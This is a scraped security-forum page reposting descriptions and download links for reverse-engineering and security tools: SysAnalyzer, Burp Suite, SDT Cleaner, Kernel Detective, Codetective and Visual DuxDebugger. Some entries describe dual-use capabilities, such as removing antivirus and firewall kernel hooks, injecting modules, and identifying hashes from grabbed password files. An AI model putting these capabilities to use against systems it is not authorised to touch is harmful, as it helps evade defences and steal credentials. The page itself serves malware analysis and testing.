UNIX time-sharing system. Commun. ACM 17, 7(July 1974), 365-375. 4. Unknown Air Force Document. Sursa: Reflections on Trusting Trust
  20. Nytro
    SysAnalyzer [TABLE] [TR] [TH=bgcolor: #E6EBFF, align: left]Author: [/TH] [TD] David Zimmer (iDefense Labs) [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Website: [/TH] [TD=colspan: 2] RE Corner [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Current version: [/TH] [TD=colspan: 2] [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Last updated: [/TH] [TD=colspan: 2] March 21, 2011 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Direct D/L link: [/TH] [TD=colspan: 2] http://sandsprite.com/CodeStuff/SysAnalyzer_Setup.exe[/TD] [/TR] [/TABLE] pdate: This tool is no longer available for download through the iDefense website. An updated installer has been made available by the author. SysAnalyzer is an automated malcode run time analysis application that monitors various aspects of system and process states. SysAnalyzer was designed to enable analysts to quickly build a comprehensive report as to the actions a binary takes on a system. SysAnalyzer can automatically monitor and compare: * Running Processes * Open Ports * Loaded Drivers * Injected Libraries * Key Registry Changes * APIs called by a target process * File Modifications * HTTP, IRC, and DNS traffic SysAnalyzer also comes with a ProcessAnalyzer tool which can perform the following tasks: * Create a memory dump of target process * parse memory dump for strings * parse strings output for exe, reg, and url references * scan memory dump for known exploit signatures Full GPL source for SysAnalyzer is included in the installation package. Download: http://sandsprite.com/CodeStuff/SysAnalyzer_Setup.exe Sursa: Category:Registry Monitoring Tools - Collaborative RCE Tool Library
  21. Nytro
    Burp Suite [TABLE] [TR] [TH=bgcolor: #E6EBFF, align: left]Author: [/TH] [TD] PortSwigger [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Website: [/TH] [TD=colspan: 2] http://www.portswigger.net/suite/ [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Current version: [/TH] [TD=colspan: 2] 1.1 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Last updated: [/TH] [TD=colspan: 2] [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Direct D/L link: [/TH] [TD=colspan: 2] http://portswigger.net/suite/download.html[/TD] [/TR] [/TABLE] Burp Suite is an integrated platform for attacking web applications. It contains all of the Burp tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All tools share the same robust framework for handling HTTP requests, authentication, downstream proxies, logging, alerting and extensibility. Burp Suite allows you to combine manual and automated techniques to enumerate, analyse, attack and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another. Key features unique to Burp Suite include: * Ability to "passively" spider an application in a non-intrusive manner, with all requests originating from the user's browser. * One-click transfer of interesting requests between tools, e.g. from the Burp Proxy request history, or the Burp Spider results tree. * Detailed analysis and rendering of requests and responses. * Extensibility via the IBurpExtender interface, which allows third-party code to extend the functionality of Burp Suite. Data processed by one tool can be used in arbitrary ways to affect the behaviour and results of other tools. * Centrally configured settings for downstream proxies, web and proxy authentication, and logging. * Tools can run in a single tabbed window, or be detached in individual windows. * All tool and suite configuration is optionally persistent across program loads. * Runs in both Linux and Windows. New features in version 1.1 include: * Improved analysis of HTTP requests and responses wherever they appear, with browser-quality HTML and media rendering. * Burp Sequencer, a new tool for analysing session token randomness. * Burp Decoder, a new tool for performing manual and intelligent decoding and encoding of application data. * Burp Comparer, a new utility for performing a visual diff of any two data items. * Support for custom client and server SSL certificates. * Ability to follow 3xx redirects in Burp Intruder and Repeater attacks. * Improved interception and match-and-replace rules in Burp Proxy. * A "lean mode", for users who prefer less functionality and a smaller resource footprint. Burp Suite is a Java application, and runs on any platform for which a Java Runtime Environment is available. It requires version 1.5 or later. The JRE can be obtained for free from java.sun.com. Download: http://www.portswigger.net/burp/downloadfree.html Sursa: Download Burp Suite
  22. Nytro
    SDT Cleaner [TABLE] [TR] [TH=bgcolor: #E6EBFF, align: left]Author: [/TH] [TD] Nahuel C. Riva [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Website: [/TH] [TD=colspan: 2] Corelabs site [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Current version: [/TH] [TD=colspan: 2] 1.0 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Last updated: [/TH] [TD=colspan: 2] [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Direct D/L link: [/TH] [TD=colspan: 2] Locally archived copy[/TD] [/TR] [/TABLE] SDT Cleaner is a tool that intends to clean the SSDT (system service descriptor table) from hooks. * The SDT Cleaner allows you to clean hooks installed by Anti-Virus and Firewalls. * This little tool (in this first release) tries to collect info from your current kernel and then switches to kernel land and if there are any hooks in SSDT, this tool will replace them with the original entries. Download: http://corelabs.coresecurity.com/index.php?module=Wiki&action=attachment&type=tool&page=SDT_Cleaner&file=SDTCleaner-v1.0.zip Sursa: Category:Kernel Hook Detection Tools - Collaborative RCE Tool Library
  23. Nytro
    Kernel Detective [TABLE] [TR] [TH=bgcolor: #E6EBFF, align: left]Author: [/TH] [TD] GamingMaster -AT4RE [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Website: [/TH] [TD=colspan: 2] http://www.at4re.com [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Current version: [/TH] [TD=colspan: 2] 1.4.1 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Last updated: [/TH] [TD=colspan: 2] December 10, 2010 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Direct D/L link: [/TH] [TD=colspan: 2] Locally archived copy[/TD] [/TR] [/TABLE] Kernel Detective is a free tool that help you detect, analyze, manually modify and fix some Windows NT kernel modifications. Kernel Detective gives you the access to the kernel directly so it's not oriented for newbies. Changing essential kernel-mode objects without enough knowledge will lead you to only one result ... BSoD ! Supported NT versions : XP/Vista/Server 2008/SEVEN Kernel Detective gives you the ability to : 1- Detect Hidden Processes. 3- Detect Hidden Threads. 2- Detect Hidden DLLs. 3- Detect Hidden Handles. 4- Detect Hidden Driver. 5- Detect Hooked SSDT. 6- Detect Hooked Shadow SSDT. 7- Detect Hooked IDT. 8- Detect Kernel-mode code modifications and hooks. 9- Disassemble (Read/Write) Kernel-mode/User-mode memory. 10- Monitor debug output on your system. Enumerate running processes and print important values like Process Id, Parent Process Id, ImageBase, EntryPoint, VirtualSize, PEB block address and EPROCESS block address. Special undocumented detection algorithms were implemented to detect hidden processes. Detect hidden and suspicious threads in system and allow user to forcely terminate them . Enumerate a specific running process Dynamic-Link Libraries and show every Dll ImageBase, EntryPoint, Size and Path. You can also inject or free specific module. Enumerate a specific running process opened handles, show every handle's object name and address and give you the ability to close the handle. Enumerate loaded kernel-mode drivers and show every driver ImageBase, EntryPoint, Size, Name and Path. Undocumented detection algorithms were implemented to detect hidden drivers. Scan the system service table (SSDT) and show every service function address and the real function address, detection algorithm improved to bypass KeServiceDescriptorTable EAT/IAT hooks.You can restore single service function address or restore the whole table. Scan the shadow system service table (Shadow SSDT) and show every shadow service function address and the real function address. You can restore single shadow service function address or restore the whole table Scan the interrupts table (IDT) and show every interrupt handler offset, selector, type, Attributes and real handler offset. This is applied to every processor in a multi-processors machines. Scan the important system kernel modules, detect the modifications in it's body and analyze it. For now it can detect and restore inline code modifications, EAT and IAT hooks. I'm looking for more other types of hooks next releases of Kernel Detective. A nice disassembler rely on OllyDbg disasm engine, thanks Oleh Yuschuk for publishing your nice disasm engine .With it you can disassemble, assemble and hex edit virtual memory of a specific process or even the kernel space memory. Kernel Detective use it's own Read/Write routines from kernel-mode and doesn't rely on any windows API. That make Kernel Detective able to R/W processes VM even if NtReadProcessMemory/NtWriteProcessMemory is hooked, also bypass the hooks on other kernel-mode important routines like KeStackAttachProcess and KeAttachProcess. Show the messages sent by drivers to the kernel debugger just like Dbgview by Mark Russinovich. It's doing this by hooking interrupt 0x2d wich is responsible for outputing debug messages. Hooking interrupts may cause problems on some machines so DebugView is turned off by default, to turn it on you must run Kernel Detective with "-debugv" parameter. Download: http://www.woodmann.com/collaborative/tools/images/Bin_Kernel_Detective_2010-12-10_17.28_Kernel_Detective_v1.4.1.rar Sursa: Category:Kernel Hook Detection Tools - Collaborative RCE Tool Library
  24. Nytro
    Codetective Analysis Tool [TABLE] [TR] [TH=bgcolor: #E6EBFF, align: left]Author: [/TH] [TD] Francisco Gama Tabanez Ribeiro [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Website: [/TH] [TD=colspan: 2] http://www.digitalloft.org [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Current version: [/TH] [TD=colspan: 2] 0.7 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Last updated: [/TH] [TD=colspan: 2] March 26, 2012 [/TD] [/TR] [TR] [TH=bgcolor: #E6EBFF, align: left] Direct D/L link: [/TH] [TD=colspan: 2] Locally archived copy[/TD] [/TR] [/TABLE] Sometimes we ran into hashes and other codes and can't figure out where did they came from and how they were built. If you work on pen-testing that might easily happen when you are testing systems from a black box perspective and you are able to grab a password file with hashed contents maybe from an exposed backup file or by dumping memory.. This may also be useful as a part of a fingerprinting process. You can either use a generic version or as a plugin for the Volatility framework. The usage is similar. Currently supports: shadow and SAM files, phpBB3, Wordpress, Joomla, CRC, LM, NTLM, MD4, MD5, Apr, SHA1, SHA256, base64, MySQL323, MYSQL4+, MSSQL2000, MSSQL2005, DES, RipeMD320, Whirlpool, SHA1, SHA224, SHA256, SHA384, SHA512, Blowfish, UUID Download: http://www.woodmann.com/collaborative/tools/images/Bin_Codetective_Analysis_Tool_2012-4-13_15.31_codetective.zip Sursa: Category:Crypto Tools - Collaborative RCE Tool Library
  25. Nytro
    [h=3]Visual DuxDebugger[/h]Visual DuxDebugger is a 64-bit debugger disassembler for Windows, especially useful when source code is unavailable.The user interface is very intuitive so it makes very simple any task in reverse engineering, you can edit code, registers, and memory. Visual DuxDebugger provides wide information about the process being debugged, showing all loaded modules with all exported functions, call stack, threads and much more. The main difference with others debuggers is that Visual DuxDebugger can debug child-processes and multiple-processes. Software Reverse Engineering is commonly used: · As a learning tool to understand undocumented APIs. · As a way to make new compatible products. · For making software interoperate more effectively. · To bridge different operating systems or databases. · To analyze possible spyware / malware. · To uncover and exploit vulnerabilities. · To audit software. · To fix complex bugs. · For litigation support. Download: http://www.duxcore.com/index.php/prod/visual-duxdebugger/overview
×
×
  • Create New...